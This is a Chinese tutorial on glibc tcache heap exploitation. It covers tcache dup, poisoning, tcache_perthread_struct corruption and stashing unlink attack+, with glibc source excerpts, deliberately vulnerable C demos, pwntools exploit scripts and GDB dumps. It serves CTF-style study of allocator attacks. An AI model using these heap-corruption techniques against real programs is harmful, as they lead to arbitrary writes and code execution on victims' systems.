Ptmalloc算法：Tcache Attack

在 Glibc的2.26 中新增了Tcache机制，这是ptmalloc2的缓存机制

Tcache是 libc-2.26 之后引入的一种机制（类似于fastbin），而 Tcache Attack 则是针对 libc-2.26 及其后续版本的攻击

整体的攻击形式和fastbin类似

Tcache 源码

每条链上最多可以有7个chunk，free的时候优先放入tcache ，当tcache满了才放入fastbin，unsorted bin，malloc的时候优先去tcache找

Tcache使用两个新的数据结构，来管理Tcache中的bin：

/* Link node stored inside a freed chunk while it is cached in a tcache bin.
   tcache_put builds it at the chunk's user-data pointer (chunk2mem), so the
   node occupies the start of the freed chunk's payload, not its header.  */
typedef struct tcache_entry
{
  /* Next cached entry in the same bin's singly linked list; the oldest
     entry in a bin holds NULL here.  */
  struct tcache_entry *next;
} tcache_entry;

/* Per-thread bookkeeping for all tcache bins.  tcache_init allocates one
   instance from the heap and zero-fills it.
   NOTE(review): counts is declared as char in this excerpt, while the
   libc-2.31 memory dumps later in this document show two-byte counters --
   confirm the element type against the glibc version being targeted.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS]; // counts[i]: number of chunks (not bins) currently cached in bin i; tcache_put increments it, tcache_get decrements it
  tcache_entry *entries[TCACHE_MAX_BINS]; // entries[i]: head of bin i's singly linked list (plays the role of the fd pointer in a fastbin)
} tcache_perthread_struct;

/* Thread-local pointer to this thread's tcache bookkeeping struct.  It stays
   NULL until tcache_init successfully allocates and installs one.  */
static __thread tcache_perthread_struct *tcache = NULL;

Tcache使用以下代码，来进行初始化：

/* Allocate and install the calling thread's tcache_perthread_struct.
   On allocation failure tcache is simply left unchanged (NULL).  */
static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct); // number of bytes to request for the struct

  /* Do nothing once the shutting-down flag is set.  */
  if (tcache_shutting_down)
    return;

  /* Pick an arena for the request (presumably also locks it, given the
     unlock below -- confirm against arena_get).  */
  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes); // the struct itself lives in an ordinary heap chunk
  /* First attempt failed but an arena was obtained: retry once with the
     arena returned by arena_get_retry.  */
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim; // publish the new struct in the thread-local pointer
      memset (tcache, 0, sizeof (tcache_perthread_struct));	// zero-fill: all counts become 0 and all bin heads NULL
    }
}

Tcache使用以下代码，来获取chunk：

  // Excerpt from the malloc entry path: try to satisfy the request from the tcache list first
  if (tc_idx < mp_.tcache_bins // the index computed from the request size is within range
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL) // the matching tcache bin is not empty
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
  // From here on the flow is similar to the one used when tcache is not available
  if (SINGLE_THREAD_P)
    {
      victim = _int_malloc (&main_arena, bytes);
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
              &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

tcache_get：

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.

   Pops the head entry of bin tc_idx and returns it as the user pointer.
   The only checks are the two asserts below; e->next is copied into the
   bin head without any validation, so whatever value sits in the freed
   chunk's next field becomes the next pointer handed out for this bin.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]); // one chunk handed out, so the bin's count drops by one
  return (void *) e;
}

Tcache使用以下代码，把chunk送入Tcache bin：

/* Elided excerpt of _int_free showing only the tcache fast path: a freed
   chunk is cached in its tcache bin whenever that bin still has room.  */
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  ......
  ......
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache
        && tc_idx < mp_.tcache_bins // bin-count limit (annotated as 64 by the author)
        && tcache->counts[tc_idx] < mp_.tcache_count) // per-bin chunk limit (annotated as 7 by the author)
      {
        /* Bin not full: cache the chunk and skip the rest of _int_free.  */
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
  ......
  ......

tcache_put：（缺少检查，造成了一种类似于 Double free 的攻击技术：tcache dup）

/* Push a freed chunk onto the head of the tcache bin selected by tc_idx
   (the index derived from the chunk size).  Nothing here checks whether
   the chunk is already present in the bin.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx]; /* new entry links to the current bin head */
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Tcache使用以下代码（即上文 _int_free 中的同一段逻辑），在 free 时把 chunk 放入 Tcache bin：

#if USE_TCACHE
  {
    /* Map the chunk size to its tcache bin index.  */
    size_t tc_idx = csize2tidx (size);

    /* Cache the chunk only if a tcache exists, the index is in range and
       the bin holds fewer than mp_.tcache_count chunks.  */
    if (tcache
	&& tc_idx < mp_.tcache_bins
	&& tcache->counts[tc_idx] < mp_.tcache_count)
      {
	tcache_put (p, tc_idx);
	return;
      }
  }
#endif

Tcache 结构

类比：Tcachebin and Fastbin

fastbin chunk，smallbin chunk，unsortedbin chunk，这些 chunk 的FD指针都指向 nextchunk 的头，所以GDB中打印这些链表的时候，会显示各个chunk的首地址
tcachebin 的 next 指针与FD有所不同，它指向下一个 chunk 的用户数据区（也就是下一个 chunk 的 next 字段所在的位置，而不是 chunk 头），所以GDB中打印 tcachebin 的时候，会显示各个chunk的数据区

记住这一点，在劫持 tcache_perthread_struct->tcache_entry 的时候会省不少事

Tcache 顺序

内存释放

在 free 函数的最先处理部分，首先是检查释放块是否页对齐及前后堆块的释放情况，便优先放入 tcache 结构中

内存申请

申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中
申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中
当在 unsorted bin 链上循环处理时，如果找到大小合适的 chunk，并不直接返回，而是先放到 tcache 中，继续处理
Tcachebin中的chunk不会分割

Tcache 利用

tcache leak

通常有两种leak：

unsortedbin leak 可以泄露“libc_base”
fastbin leak 可以泄露“heap_addr”

但是在 libc-2.26 引入 tcache 以后，释放的 chunk 先放入 tcachebin ，申请时也先从 tcache 中申请，为了把 free chunk 放入 unsortedbin 或者 fastbin（为了打上面这两种 leak），我们必须先把 tcachebin 填充满

tcache dup

类似于 Double free（上文已经提及过它的原理）

/* tcache dup demo: free the same chunk twice so that it is linked into its
   tcache bin two times.  The writes after the first free are deliberate
   use-after-free accesses.  */
int main(){

	unsigned long* chunk=malloc(0x20);

	free(chunk);
	/* Per the author, newer libc versions inspect the word in the freed
	   chunk's bk slot before accepting another free, so the payload is
	   wiped first.
	   NOTE(review): this is presumably the tcache double-free key check
	   rather than a plain NULL test -- confirm against the target glibc. */
	memset(chunk,0,0x20);
	free(chunk);
	
	return 0;
}

Free chunk (tcache) | PREV_INUSE
Addr: 0x555555559290
Size: 0x31
fd: 0x00

pwndbg> telescope 0x555555559290
00:0000│     0x555555559290 ◂— 0x0
01:0008│     0x555555559298 ◂— 0x31 /* '1' */
02:0010│ rsi 0x5555555592a0 ◂— 0x0
03:0018│     0x5555555592a8 —▸ 0x555555559010 ◂— 0x10000 /* 这个后面马上讲 */
    /* 第一个tcache的BK:永远指向tcache_perthread_struct+0x10(count的位置) */
    /* 这里也可以把tcache_perthread_struct当成一个chunk,第一个chunk永远指向它的next */
04:0020│     0x5555555592b0 ◂— 0x0

tcache poisoning

可以把它理解为 tcache 版本的 fastbin attack，这里的 next 指针其实相当于 fastbin 下的FD指针，而且没有很多的检查，将已经在 tcachebin 中的 chunk 的FD改写到目的地址，就可以malloc合适的size得到控制权

如果有修改模块直接写
没有修改模块可以用 Double free，tcache dup 重复申请
还可以用 unlink 实现 overlap 来写入目标地址

tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构，如果能控制这个结构体，那么无论我们 malloc 的 size 是多少，地址都是可控的

/* Layout demo: allocate six chunks and free them all, so that the resulting
   tcache_perthread_struct contents can be inspected in GDB.  */
int main(){

	/* Three requests of the same size: after the frees below they end up
	   chained together in a single tcache bin. */
	unsigned long* chunk1=malloc(0x10);
	unsigned long* chunk2=malloc(0x10);
	unsigned long* chunk3=malloc(0x10);
	/* Three requests of distinct sizes: one entry in each of three
	   further bins. */
	unsigned long* chunk4=malloc(0x40);
	unsigned long* chunk5=malloc(0x50);
	unsigned long* chunk6=malloc(0x60);

	/* Each bin is filled by pushing at its head, so chunk3 (freed last
	   among the 0x10 requests) ends up first in its bin. */
	free(chunk1);
	free(chunk2);
	free(chunk3);
	free(chunk4);
	free(chunk5);
	free(chunk6);
	
	return 0;
}

GDB调试开启 tcache 的程序时，第一个chunk块就是 tcache_perthread_struct：

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x291

我们可以看一下它的内容：

pwndbg> x/20xg 0x555555559000
0x555555559000:	0x0000000000000000	0x0000000000000291
0x555555559010:	0x0000000000000000	0x0000000000000000 // count
0x555555559020:	0x0000000000000000	0x0000000000000000
0x555555559030:	0x0000000000000000	0x0000000000000000
0x555555559040:	0x0000000000000000	0x0000000000000000
0x555555559050:	0x0000000000000000	0x0000000000000000
0x555555559060:	0x0000000000000000	0x0000000000000000
0x555555559070:	0x0000000000000000	0x0000000000000000
0x555555559080:	0x0000000000000000	0x0000000000000000
0x555555559090:	0x0000000000000000	0x0000000000000000 // tcache_entry

tcache_perthread_struct->count ，每两字节对应相应大小 Tcachebin 中的chunk个数
tcache_perthread_struct->tcache_entry ，每一个指针对应相应大小 Tcachebin 中第一个堆块的入口地址（指向tcache->next）

程序执行完毕后：

pwndbg> x/20xg 0x555555559000
0x555555559000:	0x0000000000000000	0x0000000000000291
0x555555559010:	0x0001000000000003	0x0000000000010001 // count
0x555555559020:	0x0000000000000000	0x0000000000000000
0x555555559030:	0x0000000000000000	0x0000000000000000
0x555555559040:	0x0000000000000000	0x0000000000000000
0x555555559050:	0x0000000000000000	0x0000000000000000
0x555555559060:	0x0000000000000000	0x0000000000000000
0x555555559070:	0x0000000000000000	0x0000000000000000
0x555555559080:	0x0000000000000000	0x0000000000000000
0x555555559090:	0x00005555555592e0	0x0000000000000000 // tcache_entry
0x5555555590a0:	0x0000000000000000	0x0000555555559300
0x5555555590b0:	0x0000555555559350	0x00005555555593b0

12:0090│  0x555555559090 —▸ 0x5555555592e0 —▸ 0x5555555592c0 —▸ 0x5555555592a0 ◂— 0x0 // 这里可以看出"tcachebin"和"fastbin" "smallbin"一样,采用"插头"的方法进入链表
13:0098│  0x555555559098 ◂— 0x0
14:00a0│  0x5555555590a0 ◂— 0x0
15:00a8│  0x5555555590a8 —▸ 0x555555559300 ◂— 0x0
16:00b0│  0x5555555590b0 —▸ 0x555555559350 ◂— 0x0
17:00b8│  0x5555555590b8 —▸ 0x5555555593b0 ◂— 0x0

注意：这是在 libc-2.31 中看到的数据，更高的 libc 版本可能会不同（以GDB看到的为准）

常见利用姿势：

一，针对“count”进行攻击：将 “sizeof(tcache_perthread_struct)” 大小对应的count设置为7，释放 tcache_perthread_struct 后，就会把整个 tcache_perthread_struct 放入 unsortedbin

这里我写了一个 tiny pwn 来加强理解，源码：

/*
 * Tiny PoC for the "count" attack on tcache_perthread_struct.
 *
 * The program locates the tcache bookkeeping chunk at the start of the heap,
 * lets the attacker overwrite the counter of the bin that matches the size
 * of that chunk, and then frees the bookkeeping chunk itself.  With the
 * counter forced to 7 the bin looks full, so the chunk is not cached in
 * tcache (the author's GDB session shows it landing in the unsorted bin).
 *
 * All out-of-bounds and use-after-free accesses are intentional.
 */
int main(){

	unsigned long* chunk=malloc(0x10);
	unsigned long* target=malloc(0x280);
	/* Step back from chunk's user pointer over its own two-word header
	   and over the 0x290-byte chunk in front of it; per the author's heap
	   dump that chunk is tcache_perthread_struct. */
	unsigned long* heap_addr=chunk-2-0x290/8;
	
	/* %p with a void* argument: the original "%x" mismatched the pointer
	   argument and dropped the upper 32 bits of the address.  glibc
	   prints the "0x" prefix for %p itself. */
	printf("heap_addr = %p\n",(void*)heap_addr);
	
	free(target); /* bumps the matching counter to 1, revealing where it lives */
	memset(heap_addr+2,0,72); /* clear the first 72 bytes of the struct's payload */
	read(0,heap_addr+2+9,0x400); /* attacker-controlled write starting at payload offset 72 */
	
	free(heap_addr+2); /* release the bookkeeping chunk itself */
	return 0;
}

攻击脚本：

from pwn import *

# Spawn the count-attack demo and attach a debugger before sending input.
io = process('./test')
gdb.attach(io)

# Eight bytes whose top 16-bit word is 7; the demo writes them at payload
# offset 72 of tcache_perthread_struct, turning the targeted counter into 7.
count_payload = p64(0x0007000000000000)
io.sendline(count_payload)
pause()

io.interactive()

打印“tcache_perthread_struct”

pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000:	0x0000000000000000	0x0000000000000291
0x5631b9f86010:	0x0000000000000000	0x0000000000000000
0x5631b9f86020:	0x0000000000000000	0x0000000000000000
0x5631b9f86030:	0x0000000000000000	0x0000000000000000
0x5631b9f86040:	0x0000000000000000	0x0000000000000000
0x5631b9f86050:	0x0000000000000000	0x0001000000000000 // 发现目标,尝试覆盖'1'为'7'
0x5631b9f86060:	0x0000000000000000	0x0000000000000000

这里的“72字节”偏移是一个比较固定的值，可以记住，当然也可以用我这种办法来查找“count”

pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000:	0x0000000000000000	0x0000000000000291
0x5631b9f86010:	0x0000000000000000	0x0000000000000000
0x5631b9f86020:	0x0000000000000000	0x0000000000000000
0x5631b9f86030:	0x0000000000000000	0x0000000000000000
0x5631b9f86040:	0x0000000000000000	0x0000000000000000
0x5631b9f86050:	0x0000000000000000	0x0007000000000000
0x5631b9f86060:	0x000000000000000a	0x0000000000000000

1 2	unsortedbin all: 0x5631b9f86000 —▸ 0x7f25cd8e1be0 (main_arena+96) ◂— 0x5631b9f86000

攻击效果：这种攻击可以创造 unsortedbin ，在限制了 size，无法获取 unsorted chunk 的程序中较为常见，后续可以 leak libc_base，也可以覆盖地址打 house of roman

利用条件：条件只有一个 - 控制“tcache_perthread_struct”，常见做法有：

利用 Double free，tcache dup 重复申请“tcache_perthread_struct”，
用WAA，或者程序提供的输入，直接写“count”
通过 unlink 实现 overlap ，写入“tcache_perthread_struct”并申请（有现成的“size”）

二，针对“tcache_entry”进行攻击：这个就真的简单粗暴了，可以直接申请任意地址

这个 tiny pwn 就比较简单了，源码：

/*
 * Tiny PoC for the "entries" attack on tcache_perthread_struct.
 *
 * The program prints the address of the tcache bookkeeping chunk and of a
 * stack variable, then lets the attacker overwrite the bookkeeping struct's
 * payload from its first byte.  Planting an address in one of the bin-head
 * slots makes that address show up as a cached chunk of the matching bin.
 *
 * The out-of-bounds write is intentional.
 */
int main(){

	unsigned long* chunk=malloc(0x10);
	unsigned long* target=malloc(0x280);
	/* Step back from chunk's user pointer over its own two-word header
	   and over the 0x290-byte chunk in front of it; per the author's heap
	   dump that chunk is tcache_perthread_struct. */
	unsigned long* heap_addr=chunk-2-0x290/8;
	int fake_addr;
	
	/* %p with void* arguments: the original "%x" mismatched the pointer
	   arguments and dropped the upper 32 bits, so the exploit script
	   received a truncated stack address.  glibc prints the "0x" prefix
	   for %p itself, which keeps the output parseable as hex. */
	printf("heap_addr = %p\n",(void*)heap_addr);
	printf("fake_addr = %p\n",(void*)&fake_addr);
	read(0,heap_addr+2,0x400); /* attacker-controlled write over counters and bin heads */
	
	return 0;
}

攻击脚本：

from pwn import*

p=process('./test')
context.log_level='debug' # debug logging makes it easy to check the leaked "fake_addr"

gdb.attach(p)
p.recvuntil(b'fake_addr = ')
# Parse the leaked hex address with int() rather than eval(): eval() would
# execute whatever text the target process prints.
fake_addr=int(p.recvuntil(b'\n')[:-1],16)
success('fake_addr >> '+hex(fake_addr))
# Bytes literal so the concatenation with p64() (bytes) also works on
# Python 3.  0x90 zero bytes clear the counters and the first two bin heads;
# the address then lands in the slot the author's dump labels as the 0x40 bin.
p.send(b'\x00'*0x90+p64(fake_addr))
pause()

p.interactive()

1	[+] fake_addr >> 0xcf63319c

pwndbg> x/20xg 0x555940911000
0x555940911000:	0x0000000000000000	0x0000000000000291
0x555940911010:	0x0000000000000000	0x0000000000000000
0x555940911020:	0x0000000000000000	0x0000000000000000
0x555940911030:	0x0000000000000000	0x0000000000000000
0x555940911040:	0x0000000000000000	0x0000000000000000
0x555940911050:	0x0000000000000000	0x0000000000000000
0x555940911060:	0x0000000000000000	0x0000000000000000
0x555940911070:	0x0000000000000000	0x0000000000000000
0x555940911080:	0x0000000000000000	0x0000000000000000
0x555940911090:	0x0000000000000000	0x0000000000000000 // '0x20'的tcache
0x5559409110a0:	0x00000000cf63319c	0x0000000000000000 // '0x40'的tcache
0x5559409110b0:	0x0000000000000000	0x0000000000000000 // '0x60'的tcache

1 2	tcachebins 0x40 [ 0]: 0xcf63319c // fake_addr

常见利用过程：

先劫持“count”把整个“tcache_perthread_struct”放入unsortedbin
然后申请两个“0x48”来分割unsortedbin，使 main_arena 写入 '0x60' tcache
在 '0x40' tcache 处写入 '0x60' tcache addr （需要申请“0x48”才能做到）
申请“0x30”（实际位置为'0x60' tcache），覆盖低地址为 hook
申请“0x50”（实际位置为 hook），打入 one_gadget

关键在于：使 '0x40' tcache 中装有 '0x60' tcache addr ，使其可以通过申请“0x30”来修改 '0x60' tcache 的地址（劫持大小为“0x60”的tcachebin）

pwndbg> x/20xg 0x558b1cfcd000
0x558b1cfcd000:	0x0000000000000000	0x0000000000000051 // 申请"0x48"
0x558b1cfcd010:	0x0001000200000000	0x0000000000000001
0x558b1cfcd020:	0x0000000000000000	0x0000000000000000
0x558b1cfcd030:	0x0000000000000000	0x0000000000000000
0x558b1cfcd040:	0x0000000000000000	0x0000000000000000
0x558b1cfcd050:	0x0000000000000000	0x0000000000000051 // 申请"0x48"
0x558b1cfcd060:	0x0000000558b1ce3c	0x0000558b1cfcd010 // 释放第二个"0x40"
0x558b1cfcd070:	0x0000000000000000	0x0000000000000000
0x558b1cfcd080:	0x0000000000000000	0x0000000000000000
0x558b1cfcd090:	0x0000000000000000	0x0000000000000000
0x558b1cfcd0a0:	0x0000558b1cfcd0b0	0x0000558b1cfcd060 // '0x40'的tcache
    		/* 伪造'0x40'的tcache(带有main_arena) */ 
0x558b1cfcd0b0:	0x00007fea097ddc00	0x00007fea097ddc00 // '0x60'的tcache
    		/* 这里曾经是unsortedbin,所以main_arena留下来了 */

tcache stashing unlink attack

很多时候常常把 tcache stashing unlink attack 和 tcache stashing unlink attack+ 称为同一种技术，但它们的功能不同

具体的利用方式如下：

tcachebin[A] 为空
smallbin[A] 有 8 个
修改第 8 个 smallbin chunk 的 bk 为 addr
分配 malloc(A) 的时候，addr+0x10 会被写一个 libc 地址

tcache stashing unlink attack+

这种攻击利用的是 tcache bin 中有剩余（数量小于 mp_.tcache_count，默认为 7）时，同大小的 small bin 会放进 tcache 中（这种情况可以使用 calloc 分配同大小堆块触发，因为 calloc 分配堆块时不从tcache bin 中选取）

在获取到一个 smallbin 中的一个 chunk 后，如果 tcache 仍有足够空闲位置，会将剩余的 smallbin 挂进 tcache 中，在这个过程中只对第一个 bin 进行了完整性检查，后面的堆块的检查缺失

当攻击者可以修改一个 small bin 的 bk 时，就可以实现在任意地址上写一个 libc 地址

具体有两种伪造方法：

第一种，适用于没有 calloc：
- tcachebin[A] 为空
- smallbin[A] 有 8 个
- 修改第 7 个 smallbin chunk 的 bk 为 addr，还要保证 addr+0x18 是一个合法可写的地址
- 分配 malloc(A) 的时候，addr 会被链入到 tcachebin，也就是可以分配到 addr 处
第二种，适用于有 calloc 但限制了申请次数：
- tcachebin[A] 不为满（如果程序中存在 malloc，则可以忽略此条件）
- smallbin[A] 有 2 个
- 修改第 2 个 smallbin chunk 的 bk 为 addr，还要保证 addr+0x18 是一个合法可写的地址
- 分配 calloc(A) 的时候，addr 会被链入到 tcachebin，也就是可以分配到 addr 处

测试案例：

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

/*
 * Demo of the "tcache stashing unlink attack+": corrupt the bk pointer of a
 * small-bin chunk so that a later calloc() stashes a fake chunk located on
 * the stack into tcache, after which malloc() returns a stack address.
 *
 * The write through chunk_lis[2] after it has been freed is the simulated
 * vulnerability and is intentional.
 */
int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    /* Initialised so that the diagnostic print below does not read an
       indeterminate pointer (the original left it uninitialised). */
    unsigned long *target = NULL;

    setbuf(stdout, NULL);
    
    printf("stack_var addr is:%p\n",&stack_var[0]);
    printf("chunk_lis addr is:%p\n",&chunk_lis[0]);
    printf("target addr is:%p\n",(void*)target);

    /* Treating stack_var as a fake chunk, word 3 is its bk slot
       (address + 0x18); the recipe requires it to hold a writable address. */
    stack_var[3] = (unsigned long)(&stack_var[2]);

    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    /* Seven frees (indices 3..8, then 1) fill the tcache bin ... */
    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }
    
    free(chunk_lis[1]);
    /* ... so these two go to the unsorted bin instead. */
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    /* A larger request moves the two unsorted chunks into the small bin;
       the two 0x90 requests then take two chunks back out of tcache,
       leaving room for the stash. */
    malloc(0xa0);
    malloc(0x90);
    malloc(0x90);
    
    /* Simulated bug: overwrite the bk word of freed chunk 2 with the
       address of the fake chunk. */
    chunk_lis[2][1] = (unsigned long)stack_var;
    /* calloc does not take chunks from tcache, so it is served from the
       small bin and the remaining small-bin chunks, followed via bk, are
       stashed into tcache -- including the fake one. */
    calloc(1,0x90);

    /* The fake chunk now heads the tcache bin, so this returns its user
       area, i.e. &stack_var[2]. */
    target = malloc(0x90);

    printf("target now: %p\n",(void*)target);

    assert(target == &stack_var[2]);
    return 0;
}

刚刚释放掉9个 chunk 后：

tcachebins
0xa0 [  7]: 0x1b0f340 —▸ 0x1b0f7a0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2be0 (main_arena+96) ◂— 0x1b0f3d0

前7个进入 tcache，后2个进入 unsortedbin

重新申请回2个 chunk 后：

tcachebins
0xa0 [  5]: 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2c70 (main_arena+240) ◂— 0x1b0f3d0

malloc(0xa0) 只是为了使 unsorted chunk 进入 smallbin

写入 stack_var 并调用 calloc 申请了一次 small chunk 后：

tcachebins
0xa0 [  7]: 0x7ffc97e66030 —▸ 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x1b0f3d0 —▸ 0x1b0f700 ◂— 0x0
BK: 0x7ffc97e66030 ◂— 0x0

由于修改了 small chunk->bk 为 stack_var，导致程序把 stack_var 给放入了 tcachebin 中
smallbin 采用“插头拿尾”（FIFO），因此程序会借助 chunk->bk 从链尾依次识别将会被放入 tcachebin 的 chunk

最后一个 malloc 用于申请 stack_var：

1 2	tcachebins 0xa0 [ 6]: 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0